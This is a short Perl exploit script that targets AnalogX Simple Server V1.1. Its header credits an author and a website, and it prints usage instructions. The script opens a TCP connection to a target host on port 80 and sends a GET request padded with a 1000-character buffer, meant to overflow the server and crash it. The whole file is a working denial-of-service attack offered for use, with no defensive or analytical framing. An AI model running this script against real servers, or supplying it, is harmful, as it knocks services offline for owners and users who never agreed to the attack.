#!/usr/bin/perl
# Description: Buffer overflow exploit for AnalogX Simple Server V1.1
# Author: Xcript (xcript@rhs-ck.com)
# Website: http://www.rhs-ck.com
use IO::Socket;
if ($ARGV[0] eq $null) {
print "\nUSAGE: perl axsploit.pl \n";
exit;
}
$host = $ARGV[0];
$port = '80';
$buffer = 'x' x 1000;
print "\nEstablishing connection to host[$host] Please wait...\n";
$socket = new IO::Socket::INET
(Proto => 'tcp', PeerAddr => $host,
PeerPort => $port)
or die &socket_error;
print "\nConnected.\n\nAttemping to kill AnalogX Simple Server...";
print $socket "GET $buffer HTTP/1.1\n\n";
close ($socket);
print "\n\nDone.\n";
sub socket_error {
print "\nConnection failed.\n";
exit;
}
exit;